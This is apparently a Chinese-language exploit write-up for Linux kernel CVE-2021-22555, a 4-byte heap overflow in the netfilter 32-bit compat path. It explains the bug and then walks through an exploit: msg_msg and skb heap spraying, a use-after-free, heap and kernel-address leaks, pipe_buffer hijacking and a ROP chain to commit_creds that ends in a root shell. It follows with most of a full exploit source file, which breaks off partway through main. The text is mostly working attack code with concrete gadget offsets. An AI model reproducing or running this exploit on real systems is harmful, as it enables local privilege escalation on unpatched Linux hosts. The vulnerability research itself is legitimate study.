CVE-2021-22555
从4字节堆溢出写0到UAF,再到提权,该 linux kernel 漏洞的利用思路非常值得学习
环境准备
漏洞影响的版本范围比较广的,根据google security-research 描述,已经 patch 的版本有 5.12,5.10.31, 5.4.113, 4.19.188, 4.14.231, 4.9.267, 4.4.267
这里偷懒选择已有的环境:
https://github.com/bsauce/kernel-exploit-factory/tree/main/CVE-2021-22555
该内核版本为 5.11.14,稍后也以这个版本的源码来解析
漏洞分析
当在 64 位 linux 下,兼容运行 32 位程序,调用 setsockopt(sockfd, SOL_IP, IPT_SO_SET_REPLACE, &data, sizeof(data))
时,内核会先调用 translate_compat_table 将 xt_table_info 32 位下的结构体转存储为 64 位模式的结构体:
/* The table itself */
struct xt_table_info {
/* Size per table */
unsigned int size;
/* Number of entries: FIXME. --RR */
unsigned int number;
/* Initial number of entries. Needed for module usage count */
unsigned int initial_entries;
/* Entry points and underflows */
unsigned int hook_entry[NF_INET_NUMHOOKS];
unsigned int underflow[NF_INET_NUMHOOKS];
/*
* Number of user chains. Since tables cannot have loops, at most
* @stacksize jumps (number of user chains) can possibly be made.
*/
unsigned int stacksize;
void ***jumpstack;
unsigned char entries[] __aligned(8);
};
其中 entries 字段指向的是由 ipt_entry 结构体组成的数组:
struct ipt_entry {
struct ipt_ip ip;
/* Mark with fields that we care about. */
unsigned int nfcache;
/* Size of ipt_entry + matches */
__u16 target_offset;
/* Size of ipt_entry + matches + target */
__u16 next_offset;
/* Back pointer */
unsigned int comefrom;
/* Packet and byte counters. */
struct xt_counters counters;
/* The matches (if any), then the target. */
unsigned char elems[0];
};
其中的 target_offset 是相对于 ipt_entry 的偏移,指向了一个 xt_entry_target 结构体:
struct xt_entry_target {
union {
struct {
__u16 target_size;
/* Used by userspace */
char name[XT_EXTENSION_MAXNAMELEN];
__u8 revision;
} user;
struct {
__u16 target_size;
/* Used inside the kernel */
struct xt_target *target;
} kernel;
/* Total length */
__u16 target_size;
} u;
unsigned char data[0];
};
漏洞出在 translate_compat_table
调用的 xt_compat_target_from_user,调用 memset(t->data + target->targetsize, pad)
对齐空间清零
void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
unsigned int *size)
{
const struct xt_target *target = t->u.kernel.target;
struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t;
int pad, off = xt_compat_target_offset(target);
u_int16_t tsize = ct->u.user.target_size;
char name[sizeof(t->u.user.name)];
t = *dstptr;
memcpy(t, ct, sizeof(*ct));
if (target->compat_from_user)
target->compat_from_user(t->data, ct->data);
else
memcpy(t->data, ct->data, tsize - sizeof(*ct));
pad = XT_ALIGN(target->targetsize) - target->targetsize;
if (pad > 0)
memset(t->data + target->targetsize, 0, pad);
tsize += off;
t->u.user.target_size = tsize;
strlcpy(name, target->name, sizeof(name));
module_put(target->me);
strncpy(t->u.user.name, name, sizeof(t->u.user.name));
*size += off;
*dstptr += tsize;
}
而在 translate_compat_table
调用 xt_alloc_table_info
处,对 size 的计算并没有 target->targetsize
的参与,而仅在 check_compat_entry_size_and_hooks
里,加上了为了对齐 matchsize 和 targetsize 的共 8 字节的大小,因此导致越界写 0 的效果
IPT_SO_SET_REPLACE 需要 CAP_NET_ADMIN 权限,但是这个权限可以在新建 user、network 的命名空间里获得
漏洞利用
xt_table_info
根据源码,可以分析出 xt_table_info 结构体的布局,如下图:
其中 match 和 target 的 data 字段都是大小可变的,转存储后,给 match 和 target 都加上的 4 字节的补齐,然后就是越界 memset 了
控制 targetsize
通过控制 targetsize ,则可以控制越界写 0,但是这个 targetsize 不能直接控制,通过选择不同的 target,对应不同的 targetsize,可以越界最多 0x4c 个字节,target 的选择在以下的调用链中check_compat_entry_size_and_hooks -> xt_request_find_target -> xt_find_target
static struct xt_target *xt_find_target(u8 af, const char *name, u8 revision)
{
struct xt_target *t;
int err = -ENOENT;
if (strnlen(name, XT_EXTENSION_MAXNAMELEN) == XT_EXTENSION_MAXNAMELEN)
return ERR_PTR(-EINVAL);
mutex_lock(&xt[af].mutex);
list_for_each_entry(t, &xt[af].target, list) {
if (strcmp(t->name, name) == 0) {
if (t->revision == revision) {
if (try_module_get(t->me)) {
mutex_unlock(&xt[af].mutex);
return t;
}
} else
err = -EPROTOTYPE; /* Found something. */
}
}
mutex_unlock(&xt[af].mutex);
if (af != NFPROTO_UNSPEC)
/* Try searching again in the family-independent list */
return xt_find_target(NFPROTO_UNSPEC, name, revision);
return ERR_PTR(err);
}
google security-research 中的 poc 所使用的 NFLOG,在 nfqueue_tg_init 中注册到 xt 变量里:
static struct xt_target nfqueue_tg_reg[] __read_mostly = {
{
.name = "NFQUEUE",
.family = NFPROTO_UNSPEC,
.target = nfqueue_tg,
.targetsize = sizeof(struct xt_NFQ_info),
.me = THIS_MODULE,
},
{
.name = "NFQUEUE",
.revision = 1,
.family = NFPROTO_UNSPEC,
.checkentry = nfqueue_tg_check,
.target = nfqueue_tg_v1,
.targetsize = sizeof(struct xt_NFQ_info_v1),
.me = THIS_MODULE,
},
{
.name = "NFQUEUE",
.revision = 2,
.family = NFPROTO_UNSPEC,
.checkentry = nfqueue_tg_check,
.target = nfqueue_tg_v2,
.targetsize = sizeof(struct xt_NFQ_info_v2),
.me = THIS_MODULE,
},
{
.name = "NFQUEUE",
.revision = 3,
.family = NFPROTO_UNSPEC,
.checkentry = nfqueue_tg_check,
.target = nfqueue_tg_v3,
.targetsize = sizeof(struct xt_NFQ_info_v3),
.me = THIS_MODULE,
},
};
可以看到这个 xt_NFQ_info_v1 结构体,只有 4 个字节,也就是 targetsize 为 4 个字节,计算得 pad = 4
:
struct xt_NFQ_info_v1 {
__u16 queuenum;
__u16 queues_total;
};
这样就可以越界写 4 字节的 0,通过调整 t->data 的位置,可以让其改写某些指针的低两字节,后面的利用中,就让这两字节改指针转化为 UAF 进行权限提升
2 字节溢出写 0
选择 xt_NFQ_info_v1,则可以 memset 4 个字节,可以想到的是,溢出写 0 用来改写某些结构体的指针来进一步利用,比如说 msg_msg.m_list.next 指针,但是改写指针低 4 个字节为 0 很可能不会得到一个有效的指针,所以需要做一下调整,只改指针低两字节则很可能得到一个有效的指针
通过调整 match 的 data 部分的大小,让 xt_table_info 结构体从一个页也就是 4K 大小中分配,并且 memset 刚好改写相邻的下一个页的低两字节,有具体如下:
int trigger_oob_write(int s)
{
struct __attribute__((__packed__))
{
struct ipt_replace replace; // 0x5c
struct ipt_entry entry; // 0x70
struct xt_entry_match match; // 0x20
char match_data[PAGE_SIZE - 0x40 - sizeof(struct ipt_entry) - sizeof(struct xt_entry_match) - sizeof(struct xt_entry_target) - 8 - 2];
struct xt_entry_target target; // 0x20
} data = {0};
data.replace.num_counters = 1;
data.replace.num_entries = 1;
data.replace.size = (sizeof(data.entry) + sizeof(data.match) +
sizeof(data.match_data) + sizeof(data.target));
data.entry.next_offset = (sizeof(data.entry) + sizeof(data.match) +
sizeof(data.match_data) + sizeof(data.target));
data.entry.target_offset =
(sizeof(data.entry) + sizeof(data.match) + sizeof(data.match_data));
data.match.u.user.match_size = (sizeof(data.match) + sizeof(data.match_data));
strcpy(data.match.u.user.name, "icmp");
data.match.u.user.revision = 0;
data.target.u.user.target_size = sizeof(data.target); // 0x20
strcpy(data.target.u.user.name, "NFQUEUE");
data.target.u.user.revision = 1;
// Partially overwrite the adjacent buffer with 2 bytes of zero.
if (setsockopt(s, SOL_IP, IPT_SO_SET_REPLACE, &data, sizeof(data)) != 0)
{
if (errno == ENOPROTOOPT)
{
printf("[-] error ip_tables module is not loaded.\n");
return -1;
}
}
return 0;
}
此时 memset 如下:
memset(t->data + target->targetsize, 0, 4);
->
memset(newinfo->entries + target_offset + 0x20(offset of data == sizeof(xt_entry_target)) + 4(target->targetsize), 0, 4);
->
memset(newinfo + 0x40 + target_offset + 0x20 + 4, 0, 4);
->
memset(newinfo + 0x40 + 0x70(sizeof ipt_entry) + 0x20(sizeof xt_entry_match) + match_data + 4(align matchsize) + 0x20 + 4, 0, 4)
->
memset(newinfo + PAGE_SIZE - 8 - 2 + 4(align matchsize) + 4(target->targetsize), 0, 4)
->
memset(newinfo + PAGE_SIZE - 2, 0, 4)
UAF
构造主消息与副消息
创建 4096 个消息队列,填充 0x1000 大小的主消息
struct
{
long mtype;
char mtext[PRIMARY_SIZE - MSG_MSG_SIZE];
} msg_primary;
...
int write_msg(int id, const void *msgp, size_t msgsz, long msgtyp)
{
*(long *)msgp = msgtyp;
if (msgsnd(id, msgp, msgsz - sizeof(long), 0) < 0) {
perror("[-] msgsnd");
return -1;
}
return 0;
}
...
puts("[*] Spraying primary messages...");
for (int i = 0; i < NUM_MSQIDS; i++) {
memset(&msg_primary, 0, sizeof(msg_primary));
*(int *)&msg_primary.mtext[0] = MSG_TAG;
*(int *)&msg_primary.mtext[4] = i;
if (write_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0) {
goto ret;
}
}
再填充大小为 0x400 的副消息:
struct
{
long mtype;
char mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
} msg_secondary;
...
puts("[*] Spraying secondary messages...");
for (int i = 0; i < NUM_MSQIDS; i++)
{
memset(&msg_secondary, 0, sizeof(msg_secondary));
*(int *)&msg_secondary.mtext[0] = MSG_TAG;
*(int *)&msg_secondary.mtext[4] = i;
if (write_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0)
goto ret;
}
Copy 一张图,如下:
注意:图中的 next 指 msg_msg->m_list->next 而不是 msg_msg->next
其中的 *(int *)&mtext[0] = MSG_TAG
用来标记该区域是消息内容区域,*(int *)&mtext[4] = i
用来标记好这个消息是哪个消息队列的消息,当漏洞触发时,next 指向改变,则主消息和副消息的 *(int *)&mtext[4]
值不一样,这样可以找到是哪个 msg_msg 结构体被更改了
制造空洞为 xt_table_info 占位做准备
间隔 1024,释放部分主消息,使得后面 xt_table_info 分配到这些空洞中
int read_msg(int id, void *msgp, size_t msgsz, long msgtyp)
{
if (msgrcv(id, msgp, msgsz - sizeof(long), msgtyp, 0) < 0)
{
perror("[-] msgrcv");
return -1;
}
return 0;
}
...
puts("[*] Creating holes in primary messages...");
for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP)
{
if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0)
goto ret;
}
再 Copy 一张图:
触发漏洞,搜索被破坏的主消息
触发 2 字节溢出写 0 后,更改了某个 msg_msg 的 m_list.next 指针,也就是副消息会指向其他地方,很可能就是另外某个主消息的副消息,利用 msgrcv 的 MSG_COPY 标志读取副消息,而不释放副消息,对比主副消息的 *(int *)&mtext[4]
是否一致,即可找到目标消息队列:
int peek_msg(int id, void *msgp, size_t msgsz, long index)
{
if (msgrcv(id, msgp, msgsz - sizeof(long), index, MSG_COPY | IPC_NOWAIT) < 0)
{
perror("[-] msgrcv");
return -1;
}
return 0;
}
...
puts("[*] Trigger oob write");
if (trigger_oob_write(s) < 0) {
perror("trigger_oob_write");
goto ret;
}
puts("[*] Searching for corrupted primary message...");
int fake_id = -1, real_id = -1;
for (int i = 0; i < NUM_MSQIDS; i++)
{
if (i != 0 && !(i % HOLE_STEP))
continue;
if (peek_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), 1) < 0)
goto ret;
if (*(int *)&msg_secondary.mtext[0] != MSG_TAG)
{
printf("[-] MSG_TAG error\n");
goto ret;
}
if (*(int *)&msg_secondary.mtext[4] != i)
{
real_id = *(int *)&msg_secondary.mtext[4];
fake_id = i;
break;
}
}
if (real_id == -1 && fake_id == -1)
{
printf("[-] Could not corrupt any primary message\n");
goto ret;
}
printf("[+] real_id = %#x, fake_id = %#x\n", real_id, fake_id);
如图:
释放副消息造成 UAF
利用 real_id 读取释放副消息,fake_id 的副消息指向已经释放的消息,则造成 UAF
puts("[*] Free secondary message and then gain UAF");
if (read_msg(real_id, &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0)
goto ret;
如图:
有了 UAF 后,这里大致描述下利用思路
- skb 堆喷占位,伪造副消息
- fake_id peek 副消息来 leak 堆地址
- 释放 skb ,利用 leak 出的堆地址来 skb 堆喷伪造合法的副消息
- fake_id read 释放副消息,因为此时副消息的指针都合法可以脱链
- pipe_buffer 堆喷占位
- 读取并释放 skb,读到 pipe_buffer 的内容,泄露 kernel 地址
- skb 堆喷劫持 pipe_buffer->ops
- close pipe,劫持程序执行流提权
skb 堆喷伪造副消息
首先得先泄露堆地址,用于后面伪造合法的副消息
leak heap
利用 skb 堆喷伪造副消息,伪造 m_ts,利用 fake_id 队列 peek 副消息,即可越界读到相邻的副消息的 msg_msg 结构体,可以泄露 msg_msg->m_list->next
和 msg_msg->m_list->prev
堆地址
struct msg_msg
{
uint64_t m_list_next;
uint64_t m_list_prev;
uint64_t m_type;
uint64_t m_ts;
uint64_t next;
uint64_t security;
};
struct
{
long mtype;
char mtext[PAGE_SIZE - MSG_MSG_SIZE + PAGE_SIZE - MSG_MSGSEG_SIZE];
} msg_fake;
...
void build_msg_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev, uint64_t m_ts, uint64_t next)
{
msg->m_list_next = m_list_next;
msg->m_list_prev = m_list_prev;
msg->m_type = MTYPE_FAKE;
msg->m_ts = m_ts;
msg->next = next;
msg->security = 0;
}
int spray_skbuff(int ss[NUM_SOCKETS][2], const void *buf, size_t size)
{
for (int i = 0; i < NUM_SOCKETS; i++)
{
for (int j = 0; j < NUM_SKBUFFS; j++)
{
if (write(ss[i][0], buf, size) < 0)
{
perror("[-] write");
return -1;
}
}
}
return 0;
}
...
int ss[NUM_SOCKETS][2];
char primary_buf[PRIMARY_SIZE - SKB_SHARED_INFO_SIZE];
char secondary_buf[SECONDARY_SIZE - SKB_SHARED_INFO_SIZE];
struct msg_msg *msg;
uint64_t kheap;
...
puts("[*] Free secondary message and then gain UAF");
if (read_msg(msqid[real_id], &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0)
goto ret;
puts("[*] Spraying fake secondary messages...");
memset(secondary_buf, 0, sizeof(secondary_buf));
build_msg_msg((struct msg_msg *)secondary_buf, 0x41414141, 0x42424242, PAGE_SIZE - MSG_MSG_SIZE, 0);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
puts("[*] Leaking adjacent secondary message...");
if (peek_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), 1) < 0)
goto ret;
if (*(int *)&msg_fake.mtext[SECONDARY_SIZE] != MSG_TAG)
{
printf("[-] Could not leak adjacent secondary message");
goto ret;
}
msg = (struct msg_msg *)&msg_fake.mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
kheap = msg->m_list_next; // kheap pointer to the primary message
if (kheap & (PRIMARY_SIZE - 1))
kheap = msg->m_list_prev;
printf("[+] kheap = %#" PRIx64 "\n", kheap);
此时的 kheap 就是相邻副消息的 m_list->next 或者 m_list->prev,指向的就是他对应的主消息
leak address of msg_fake
释放 skb,然后伪造 msg_msg->next=kheap-MSG_MSGSEG_SIZE
,也就是让这个主消息成为这个副消息的 msg_msgseg 结构,这样读取副消息的时候,就能把这个主消息也读出来,就能读到 m_list->next 也就是 fake_msg 相邻副消息的地址,减去 SECONDARY_SIZE 就是 msg_fake 的地址:
puts("[*] Freeing skb...");
if (free_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
puts("[*] Spraying fake secondary messages...");
memset(secondary_buf, 0, sizeof(secondary_buf));
build_msg_msg((struct msg_msg *)secondary_buf, 0x41414141, 0x42424242, sizeof(msg_fake.mtext), kheap - MSG_MSGSEG_SIZE);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
puts("[*] Leaking address of msg_fake");
if (peek_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), 1) < 0)
goto ret;
if (*(int *)&msg_fake.mtext[PAGE_SIZE] != MSG_TAG)
{
printf("[-] Could not leak address of msg_fake\n");
goto ret;
}
msg = (struct msg_msg *)&msg_fake.mtext[PAGE_SIZE-MSG_MSG_SIZE];
msg_fake_addr = msg->m_list_next;
if (msg_fake_addr & (SECONDARY_SIZE - 1))
msg_fake_addr = msg->m_list_prev;
msg_fake_addr -= SECONDARY_SIZE;
printf("[+] address of msg_fake = %#" PRIx64 "\n", msg_fake_addr);
伪造合法副消息并释放,构造 skb 可控的 UAF
有了 msg_fake 的地址,只要让 msg_fake->m_list->next = msg_fake_addr
,随后释放副消息即可成功脱链,留下一块 skb 指向的 free 掉的内存:
puts("[*] Free secondary message and then gain UAF controlled by skb");
if (free_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
build_msg_msg((struct msg_msg *)secondary_buf, msg_fake_addr, msg_fake_addr, 0, 0);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
if (read_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), MTYPE_FAKE) < 0)
goto ret;
大概就像这样
skb & pipe_buffer 的 UAF 利用思路
leak kernel base
堆喷 pipe_buffer,利用 skb read 泄露 ops 指针,计算出 kernel 基址:
puts("[*] Spraying pipe_buffer objects...");
for (int i = 0; i < NUM_PIPEFDS; i++)
{
if (pipe(pipefd[i]) < 0)
{
perror("[-] pipe");
goto ret;
}
if (write(pipefd[i][1], "xi4oyu", 6) < 0)
{
perror("[-] write");
goto ret;
}
}
puts("[*] Leaking and freeing pipe_buffer object...");
for (int i = 0; i < NUM_SOCKETS; i++)
{
for (int j = 0; j < NUM_SKBUFFS; j++)
{
if (read(ss[i][1], secondary_buf, sizeof(secondary_buf)) < 0)
{
perror("[-] read");
goto ret;
}
if (*(uint64_t *)&secondary_buf[0x10] != MTYPE_FAKE) {
pipe_buffer_ops = *(uint64_t *)&secondary_buf[0x10];
break;
}
}
}
kernel_offset = pipe_buffer_ops - 0xffffffff8223e140; // anon_pipe_buf_ops
kernel_base = kernel_offset + 0xffffffff81000000;
printf("[+] pipe_buffer_ops = %#" PRIx64 "\n", pipe_buffer_ops);
printf("[+] kernel_base = %#" PRIx64 "\n", kernel_base);
printf("[+] kernel_offset = %#" PRIx64 "\n", kernel_offset);
hijack control follow
skb 堆喷伪造 pipe_buffer,劫持 ops 指针,劫持程序控制流,当关闭管道时,最后进入下面的函数释放 pipe_buffer,可知 rsi 指向 pipe_buffer,可以栈迁移到 pipe_buffer,随后 ROP
static inline void pipe_buf_release(struct pipe_inode_info *pipe,
struct pipe_buffer *buf)
{
const struct pipe_buf_operations *ops = buf->ops;
buf->ops = NULL;
ops->release(pipe, buf);
}
ROP 执行 commit_creds(&init_cred)
提权,平衡栈最后回到用户态起 shell 即可,具体操作如下:
puts("[*] Spraying fake pipe_buffer...");
memset(secondary_buf, 0, sizeof(secondary_buf));
buf = (struct pipe_buffer *)secondary_buf;
buf->ops = msg_fake_addr + 0x200;
ops = (struct pipe_buf_operations *)&secondary_buf[0x200];
ops->release = kernel_offset + 0xffffffff8172e1ac; // push rsi ; jmp qword ptr [rsi + 0x39]
*(uint64_t *)&secondary_buf[0] = kernel_offset + 0xffffffff8106f8c9; // add rsp, 0xd0 ; ret
*(uint64_t *)&secondary_buf[0x39] = kernel_offset + 0xffffffff81163ea0; // pop rsp ; ret
rop = (uint64_t *)&secondary_buf[0xd0 + 8];
ridx = 0;
rop[ridx++] = kernel_offset + 0xffffffff8108c650; // pop rdi ; ret
rop[ridx++] = kernel_offset + 0xffffffff8286b780; // init_cred
rop[ridx++] = kernel_offset + 0xffffffff810c9f00; // commit_creds
rop[ridx++] = kernel_offset + 0xffffffff8108c5bc; // mov rsp, rbp ; pop rbp ; ret
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
puts("[*] Releasing pipe_buffer objects...");
for (int i = 0; i < NUM_PIPEFDS; i++)
{
if (close(pipefd[i][0]) < 0)
{
perror("[-] close");
goto ret;
}
if (close(pipefd[i][1]) < 0)
{
perror("[-] close");
goto ret;
}
}
system("/bin/sh");
exp
完整 exp 如下:
// gcc -m32 -static -o exp exp.c
#define _GNU_SOURCE
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/types.h>
#include <string.h>
#include <stdint.h>
#include <sys/socket.h>
#include <net/if.h>
#include <netinet/in.h>
#include <err.h>
#include <linux/netfilter_ipv4/ip_tables.h>
#include <linux/netfilter/x_tables.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <sched.h>
#include <inttypes.h>
#define PAGE_SIZE 0x1000
#define PRIMARY_SIZE 0x1000
#define SECONDARY_SIZE 0x400
#define NUM_SOCKETS 4
#define NUM_SKBUFFS 128
#define NUM_PIPEFDS 128
#define NUM_MSQIDS 4096
#define HOLE_STEP 1024
#define MTYPE_PRIMARY 0x41
#define MTYPE_SECONDARY 0x42
#define MTYPE_FAKE 0x1337
#define MSG_TAG 0xAAAAAAAA
#define SKB_SHARED_INFO_SIZE 0x140
#define MSG_MSG_SIZE (sizeof(struct msg_msg))
#define MSG_MSGSEG_SIZE (sizeof(struct msg_msgseg))
struct msg_msg
{
uint64_t m_list_next;
uint64_t m_list_prev;
uint64_t m_type;
uint64_t m_ts;
uint64_t next;
uint64_t security;
};
struct msg_msgseg
{
uint64_t next;
};
struct pipe_buffer
{
uint64_t page;
uint32_t offset;
uint32_t len;
uint64_t ops;
uint32_t flags;
uint32_t pad;
uint64_t private;
};
struct pipe_buf_operations
{
uint64_t confirm;
uint64_t release;
uint64_t steal;
uint64_t get;
};
struct
{
long mtype;
char mtext[PRIMARY_SIZE - MSG_MSG_SIZE];
} msg_primary;
struct
{
long mtype;
char mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
} msg_secondary;
struct
{
long mtype;
char mtext[PAGE_SIZE - MSG_MSG_SIZE + PAGE_SIZE - MSG_MSGSEG_SIZE];
} msg_fake;
void getRootShell(void)
{
puts("\033[32m\033[1m[+] Backing from the kernelspace.\033[0m");
if (getuid())
{
puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
exit(-1);
}
puts("\033[32m\033[1m[+] Successful to get the root. Execve root shell "
"now...\033[0m");
system("/bin/sh");
exit(0); // to exit the process normally instead of segmentation fault
}
int trigger_oob_write(int s)
{
struct __attribute__((__packed__))
{
struct ipt_replace replace; // 0x5c
struct ipt_entry entry; // 0x70
struct xt_entry_match match; // 0x20
char match_data[PAGE_SIZE - 0x40 - sizeof(struct ipt_entry) - sizeof(struct xt_entry_match) - sizeof(struct xt_entry_target) - 8 - 2];
struct xt_entry_target target; // 0x20
} data = {0};
data.replace.num_counters = 1;
data.replace.num_entries = 1;
data.replace.size = (sizeof(data.entry) + sizeof(data.match) +
sizeof(data.match_data) + sizeof(data.target));
data.entry.next_offset = (sizeof(data.entry) + sizeof(data.match) +
sizeof(data.match_data) + sizeof(data.target));
data.entry.target_offset =
(sizeof(data.entry) + sizeof(data.match) + sizeof(data.match_data));
data.match.u.user.match_size = (sizeof(data.match) + sizeof(data.match_data));
strcpy(data.match.u.user.name, "icmp");
data.match.u.user.revision = 0;
data.target.u.user.target_size = sizeof(data.target); // 0x20
strcpy(data.target.u.user.name, "NFQUEUE");
data.target.u.user.revision = 1;
// Partially overwrite the adjacent buffer with 2 bytes of zero.
if (setsockopt(s, SOL_IP, IPT_SO_SET_REPLACE, &data, sizeof(data)) != 0)
{
if (errno == ENOPROTOOPT)
{
printf("[-] error ip_tables module is not loaded.\n");
return -1;
}
}
return 0;
}
int setup_sandbox(void)
{
if (unshare(CLONE_NEWUSER) < 0)
{
perror("[-] unshare(CLONE_NEWUSER)");
return -1;
}
if (unshare(CLONE_NEWNET) < 0)
{
perror("[-] unshare(CLONE_NEWNET)");
return -1;
}
cpu_set_t set;
CPU_ZERO(&set);
CPU_SET(0, &set);
if (sched_setaffinity(getpid(), sizeof(set), &set) < 0)
{
perror("[-] sched_setaffinity");
return -1;
}
return 0;
}
int write_msg(int id, const void *msgp, size_t msgsz, long msgtyp)
{
*(long *)msgp = msgtyp;
if (msgsnd(id, msgp, msgsz - sizeof(long), 0) < 0)
{
perror("[-] msgsnd");
return -1;
}
return 0;
}
int read_msg(int id, void *msgp, size_t msgsz, long msgtyp)
{
if (msgrcv(id, msgp, msgsz - sizeof(long), msgtyp, 0) < 0)
{
perror("[-] msgrcv");
return -1;
}
return 0;
}
int peek_msg(int id, void *msgp, size_t msgsz, long index)
{
if (msgrcv(id, msgp, msgsz - sizeof(long), index, MSG_COPY | IPC_NOWAIT) < 0)
{
perror("[-] msgrcv");
return -1;
}
return 0;
}
void build_msg_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev, uint64_t m_ts, uint64_t next)
{
msg->m_list_next = m_list_next;
msg->m_list_prev = m_list_prev;
msg->m_type = MTYPE_FAKE;
msg->m_ts = m_ts;
msg->next = next;
msg->security = 0;
}
int spray_skbuff(int ss[NUM_SOCKETS][2], const void *buf, size_t size)
{
for (int i = 0; i < NUM_SOCKETS; i++)
{
for (int j = 0; j < NUM_SKBUFFS; j++)
{
if (write(ss[i][0], buf, size) < 0)
{
perror("[-] write");
return -1;
}
}
}
return 0;
}
int free_skbuff(int ss[NUM_SOCKETS][2], void *buf, size_t size)
{
for (int i = 0; i < NUM_SOCKETS; i++)
{
for (int j = 0; j < NUM_SKBUFFS; j++)
{
if (read(ss[i][1], buf, size) < 0)
{
perror("[-] read");
return -1;
}
}
}
return 0;
}
int main(int argc, char const *argv[])
{
int s;
int msqid[NUM_MSQIDS];
int ss[NUM_SOCKETS][2];
int pipefd[NUM_PIPEFDS][2];
int fake_id = -1, real_id = -1;
char primary_buf[PRIMARY_SIZE - SKB_SHARED_INFO_SIZE];
char secondary_buf[SECONDARY_SIZE - SKB_SHARED_INFO_SIZE];
struct msg_msg *msg;
uint64_t kheap = 0, msg_fake_addr = 0;
uint64_t pipe_buffer_ops = 0, kernel_base = 0, kernel_offset = 0;
struct pipe_buf_operations *ops;
struct pipe_buffer *buf;
int ridx = 0;
uint64_t *rop;
if (setup_sandbox() < 0)
return -1;
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
return -1;
}
for (int i = 0; i < NUM_PIPEFDS; i++)
{
if (socketpair(AF_UNIX, SOCK_STREAM, 0, ss[i]) < 0)
{
perror("socketpair");
return -1;
}
}
puts("[*] Setup message queues");
memset(msqid, -1, sizeof(msqid));
for (int i = 0; i < NUM_MSQIDS; i++)
{
if ((msqid[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0)
{
goto ret;
}
}
puts("[*] Spraying primary messages...");
for (int i = 0; i < NUM_MSQIDS; i++)
{
memset(&msg_primary, 0, sizeof(msg_primary));
*(int *)&msg_primary.mtext[0] = MSG_TAG;
*(int *)&msg_primary.mtext[4] = i;
if (write_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0)
{
goto ret;
}
}
puts("[*] Spraying secondary messages...");
for (int i = 0; i < NUM_MSQIDS; i++)
{
memset(&msg_secondary, 0, sizeof(msg_secondary));
*(int *)&msg_secondary.mtext[0] = MSG_TAG;
*(int *)&msg_secondary.mtext[4] = i;
if (write_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0)
goto ret;
}
puts("[*] Creating holes in primary messages...");
for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP)
{
if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0)
goto ret;
}
puts("[*] Trigger oob write");
if (trigger_oob_write(s) < 0)
goto ret;
puts("[*] Searching for corrupted primary message...");
for (int i = 0; i < NUM_MSQIDS; i++)
{
if (i != 0 && !(i % HOLE_STEP))
continue;
if (peek_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), 1) < 0)
goto ret;
if (*(int *)&msg_secondary.mtext[0] != MSG_TAG)
{
printf("[-] MSG_TAG error\n");
goto ret;
}
if (*(int *)&msg_secondary.mtext[4] != i)
{
real_id = *(int *)&msg_secondary.mtext[4];
fake_id = i;
break;
}
}
if (real_id == -1 && fake_id == -1)
{
printf("[-] Could not corrupt any primary message\n");
goto ret;
}
printf("[+] real_id = %#x, fake_id = %#x\n", real_id, fake_id);
puts("[*] Free secondary message and then gain UAF");
if (read_msg(msqid[real_id], &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0)
goto ret;
puts("[*] Spraying fake secondary messages...");
memset(secondary_buf, 0, sizeof(secondary_buf));
build_msg_msg((struct msg_msg *)secondary_buf, 0x41414141, 0x42424242, PAGE_SIZE - MSG_MSG_SIZE, 0);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
puts("[*] Leaking adjacent secondary message...");
if (peek_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), 1) < 0)
goto ret;
if (*(int *)&msg_fake.mtext[SECONDARY_SIZE] != MSG_TAG)
{
printf("[-] Could not leak adjacent secondary message");
goto ret;
}
msg = (struct msg_msg *)&msg_fake.mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
kheap = msg->m_list_next; // kheap pointer to the primary message
if (kheap & (PRIMARY_SIZE - 1))
kheap = msg->m_list_prev;
printf("[+] kheap = %#" PRIx64 "\n", kheap);
puts("[*] Freeing skb...");
if (free_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
puts("[*] Spraying fake secondary messages...");
memset(secondary_buf, 0, sizeof(secondary_buf));
build_msg_msg((struct msg_msg *)secondary_buf, 0x41414141, 0x42424242, sizeof(msg_fake.mtext), kheap - MSG_MSGSEG_SIZE);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
